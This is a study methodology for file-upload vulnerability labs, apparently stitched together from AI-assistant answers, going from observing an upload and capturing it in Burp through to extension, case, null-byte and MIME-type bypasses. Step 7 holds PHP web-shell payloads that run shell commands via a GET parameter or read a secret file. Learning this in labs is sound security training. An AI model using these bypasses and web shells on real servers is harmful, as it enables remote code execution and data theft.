-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
                                                                       STEP 1 METHODOLOGY

===========================================================================================================================================================================================

#FILE UPLOAD LAB METHODOLOGY (STEP-BY-STEP)

Think of this as your **default flow**. Follow it in order, every lab.

---

#STEP 1 — “Touch the Feature”

Just use the upload normally.

* Upload a valid file (e.g., image)
* See:

  * Does it upload?
  * Where does it appear?
  * Can you access it via URL?

Goal:

> Understand how the app behaves normally
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
                                                                   STEP 1 BRIEF DESCRIPTION
===========================================================================================================================================================================================

STEP 1 — “Touch the Feature” (clear example)
This step is only about **understanding the application**, not attacking.
### Scenario
You open a lab page with a file upload feature (e.g., profile picture upload).
---
### Action 1: Upload a normal file
Upload something valid like:
```
image.jpg
```

Do not use Burp yet. Just use the app normally.

---

### Action 2: Observe the result

After uploading, check carefully:

#### 1. Did the upload succeed?

* If yes → continue
* If error → read the message (it may reveal restrictions)

---

#### 2. Where is the file displayed?

Look at the page:

* Is the image shown?
* Right-click → “Open image in new tab”

You might see a URL like:

```
/files/avatars/image.jpg
```

This tells you the **storage path**.

---

#### 3. Can you access the file directly?

Paste the URL in a new tab:

```
/files/avatars/image.jpg
```

* If it opens → files are publicly accessible
* If not → access might be restricted

---

#### 4. Did the filename change?

You uploaded:

```
image.jpg
```

But the app might store it as:

```
abc123.jpg
```

This means:

* The server renames files
* You cannot rely on your original filename later

---

#### 5. How is the file handled?

When you open the file:

* Displays normally → standard behavior
* Downloads → different handling
* Shows raw content → useful clue

---

## What you gain from Step 1

By doing just this, you learn:

* Whether upload works at all
* Where files are stored
* How to access uploaded files
* Whether filenames are modified
* How the server serves files

---

## Why this step matters

If you skip this, you won’t know:

* Where to access your uploaded payload
* Whether execution is even possible
* Whether the server renames or relocates files

That’s why many people fail labs—they start attacking without understanding the system.

---

## Short version to remember

```
1. Upload a normal file
2. Check if it works
3. Find file URL
4. Open it directly
5. Observe filename and behavior
```
FINAL REMINDER 

Got it. I’ll keep it clean and focused.

---

## STEP 1 — “Touch the Feature” (clear example)

This step is only about **understanding the application**, not attacking.

### Scenario

You open a lab page with a file upload feature (e.g., profile picture upload).

---

### Action 1: Upload a normal file

Upload something valid like:

```
image.jpg
```

Do not use Burp yet. Just use the app normally.

---

### Action 2: Observe the result

After uploading, check carefully:

#### 1. Did the upload succeed?

* If yes → continue
* If error → read the message (it may reveal restrictions)

---

#### 2. Where is the file displayed?

Look at the page:

* Is the image shown?
* Right-click → “Open image in new tab”

You might see a URL like:

```
/files/avatars/image.jpg
```

This tells you the **storage path**.

---

#### 3. Can you access the file directly?

Paste the URL in a new tab:

```
/files/avatars/image.jpg
```

* If it opens → files are publicly accessible
* If not → access might be restricted

---

#### 4. Did the filename change?

You uploaded:

```
image.jpg
```

But the app might store it as:

```
abc123.jpg
```

This means:

* The server renames files
* You cannot rely on your original filename later

---

#### 5. How is the file handled?

When you open the file:

* Displays normally → standard behavior
* Downloads → different handling
* Shows raw content → useful clue

---

## What you gain from Step 1

By doing just this, you learn:

* Whether upload works at all
* Where files are stored
* How to access uploaded files
* Whether filenames are modified
* How the server serves files

---

## Why this step matters

If you skip this, you won’t know:

* Where to access your uploaded payload
* Whether execution is even possible
* Whether the server renames or relocates files

That’s why many people fail labs—they start attacking without understanding the system.

---

## Short version to remember

```
1. Upload a normal file
2. Check if it works
3. Find file URL
4. Open it directly
5. Observe filename and behavior
```

---

If you want, next I can explain Step 2 (intercepting the request in Burp) in the same practical way.
========================================================================================================================================================================================
# 🔍 STEP 2 — Intercept Request (Burp)

========================================================================================================================================================================================

* Capture upload request
* Send to **Repeater**

Focus on:

```
filename=
Content-Type=
file content
```

Goal:

> You now control the upload manually

---
========================================================================================================================================================================================

STEP 2 DESCRIPTION
=======================================================================================================================================================================================
# STEP 2 — “Capture and Understand the Upload Request”

## Purpose of this step

You are NOT attacking yet.

You are:

> Capturing the exact structure of how the file is being sent to the server.

This becomes your **attack template** for everything later.

---

# 🧠 STEP 2 METHODOLOGY (PERFECT VERSION)

---

## 1. Enable interception OR observe request

You have two options:

### Option A (preferred for learning)

* Turn ON Burp Intercept
* Upload file again

### Option B (faster)

* Use Burp HTTP history / DevTools Network tab

---

## 2. Upload the SAME normal file again

Use:

```id="s2a"
image.jpg
```

Important:

* Do NOT use payload yet
* You want a **clean working request**

---

## 3. Capture the full request

You will see something like:

```http id="s2b"
POST /upload HTTP/1.1
Content-Type: multipart/form-data; boundary=xyz

------xyz
Content-Disposition: form-data; name="file"; filename="image.jpg"
Content-Type: image/jpeg

(binary data)
------xyz--
```

---

## 4. Identify the 4 critical components

You MUST always extract these:

---

### (A) Upload parameter name

Example:

```id="s2c"
name="file"
```

This tells you:

* What field the server processes

---

### (B) Filename field

```id="s2d"
filename="image.jpg"
```

This is your **main attack point later**

---

### (C) Content-Type header

```id="s2e"
Content-Type: image/jpeg
```

This shows:

* What the browser claims it is

---

### (D) File content section

```id="s2f"
(binary data)
```

This is what you will later replace with PHP code

---

## 5. Send request to Repeater

Now:

* Right click request
* Send to Repeater
* Turn Intercept OFF

---

## 6. First modification test (baseline behavior)

Now you test ONE variable only:

### Test 1 — change filename only

```id="s2g"
filename="test.php"
```

Keep everything else same.

---

### Observe:

* Allowed?
* Blocked?
* Error message?

---

## 7. Second modification test (isolation method)

Now restore filename and change content only:

Replace:

```id="s2h"
(binary data)
```

With:

```php id="s2i"
<?php echo "test"; ?>
```

Keep:

```id="s2j"
Content-Type: image/jpeg
```

---

### Observe:

* Is file accepted?
* Is it executed?
* Is it blocked?

---

## 8. Third check — MIME trust test

Try changing:

```id="s2k"
Content-Type: application/x-php
```

or keep it as image/jpeg

Observe if server trusts it or not.

---

## 9. Collect behavioral results

At this point you should be able to answer:

### Questions:

* Does server trust filename?
* Does it trust extension?
* Does it inspect content?
* Does it trust MIME type?

---

# 🧠 OUTPUT OF STEP 2 (WHAT YOU SHOULD HAVE)

After Step 2, you should have:

```id="s2final"
1. Full upload request structure
2. Parameter names
3. Filename handling behavior
4. Content-Type behavior
5. First bypass results
6. Server validation pattern hypothesis
```

---

# ⚠️ COMMON MISTAKE (AVOID THIS)

❌ Changing multiple things at once
❌ Jumping directly to shell.php
❌ Not observing responses carefully

---

# 🧱 SIMPLE MEMORY VERSION

If you want to remember Step 2 in one line:

```id="s2memory"
Capture request → isolate fields → test one change at a time → observe validation behavior
```

---

# 🧠 WHY THIS STEP IS CRITICAL

This step tells you:

* What the server actually checks
* What is safe to modify
* What attack path will work

Without this step:

> You are guessing blindly

With this step:

> You are testing the system logically



========================================================================================================================================================================================
========================================================================================================================================================================================

#STEP 3 — Quick Baseline Tests (ALWAYS DO THIS)

Don’t think yet — just test:

### Test 1:

```
shell.php
```

Result?

* Blocked → filtering exists
* Allowed → easy lab 

---

### Test 2:

```
shell.jpg
```

Confirms allowed type

---

### Test 3:

```
random.abc
```

This tells you:

| Result  | Meaning   |
| ------- | --------- |
| Allowed | blacklist |
| Blocked | whitelist |

---

Goal:

> Identify **filter type quickly**

---

#STEP 4 — Decide Strategy (NO GUESSING)

Now decide:

### If BLACKLIST →

Try bypass

### If WHITELIST →

Trick validation

### If CONTENT CHECK →

Fake content

---

#STEP 5 — Apply Bypass Categories (IN ORDER)

This is your **attack sequence** — follow it step-by-step.

---

##5.1 Extension Tricks (START HERE ALWAYS)

Try:

```
.php
.php5
.phtml
.phar
```

---

##5.2 Double Extension

```
shell.php.jpg
shell.jpg.php
```

---

##5.3 Case Bypass

```
shell.PHP
shell.pHp
```

---

##5.4 Trailing / Encoding Tricks

```
shell.php.
shell.php%00.jpg
```

---

##5.5 MIME Type Change (in Burp)

```
Content-Type: image/jpeg
```

---

Important:
Do NOT jump randomly
Go **step by step**

---

#STEP 6 — After Each Upload → CHECK THIS

Every time something uploads:

Immediately:

* Open file URL

Ask:

* Does it execute?
* Or just download?

---

#STEP 7 — If Execution Works → Exploit

Use simple payload:

```php
<?php echo file_get_contents('/home/carlos/secret'); ?>
```

OR:

```php
<?php system($_GET['cmd']); ?>
```

---

#STEP 8 — If Nothing Works → Think (IMPORTANT)

Now pause and ask:

* Is it checking content instead of extension?
* Is filename being changed?
* Is file stored but not executable?

Then adapt:

* Try polyglot (image + PHP)
* Try path tricks
* Try different extension again

---

#YOUR LAB FLOW (SHORT VERSION)

Memorize this:

```
1. Upload normal file
2. Intercept request
3. Test: .php / .jpg / random
4. Identify filter (blacklist/whitelist)
5. Apply bypass in order:
   → extensions
   → double extension
   → case
   → encoding
   → MIME
6. Access uploaded file
7. Confirm execution
8. Exploit
```

---

#WHAT THIS FIXES IN YOU

Right now your problem is:

> “Where do I start?”

This method gives you:
 A fixed starting point
A fixed order
No confusion

---

# ⚡ Final Advice (Very Important)

Do NOT:
Jump to payloads
 Copy solutions

Do:
Follow the flow every time
Observe response carefully

---

